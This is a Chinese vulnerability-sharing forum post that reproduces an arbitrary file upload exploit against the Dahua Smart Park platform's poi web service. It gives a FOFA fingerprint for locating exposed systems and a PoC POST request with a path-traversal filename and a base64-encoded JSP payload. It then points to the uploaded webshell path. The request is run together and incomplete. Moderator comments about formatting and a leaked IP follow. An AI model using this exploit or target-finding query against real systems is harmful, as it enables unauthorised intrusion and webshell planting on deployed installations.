大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)
没错,又是我
大华智慧园区 poi 任意文件上传漏洞复现 (截止发文时间,部分网站已修复)
还是老规矩,fofa先上
fofa指纹:body=”/WPMS/asset/lib/gridster/“
主站页面如下
上poc
POC文字版
POST /emap/webservice/gis/soap/poi HTTP/1.1Host: e.m.p.e:ror/../../emperor.jspPCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPgo8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZCBISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUgPSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKTsKZmlsZS5kZWxldGUoKTsKJT4=
传了马以后直接访问
文字路径:/upload/马子.jsp
| 用户名 | 金币 | 积分 | 时间 | 理由 |
|---|---|---|---|---|
| Track-魔方 | 400.00 | 0 | 2023-09-06 21:09:01 | 深度100 普适 300 |
打赏我,让我更有动力~
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
Track-魔方
发表于 8个月前
POC这里能用代码块包裹住吗,并且补全为完整的一个请求数据包,敏感信息脱敏即可
评论列表
加载数据中...
Track-魔方
发表于 8个月前
本月奖金池已空,金币奖励将于下月打赏
评论列表
加载数据中...
Track-魔方
发表于 7个月前
同学需要注意文章可读性问题,漏洞复现POC应当用代码块包裹,并且给出完整的数据包,格式上这次我就稍微帮你改了一下
评论列表
加载数据中...
Track-魔方
发表于 7个月前
打码也需要注意一下,ip地址漏了,这次我帮你码上了
评论列表
加载数据中...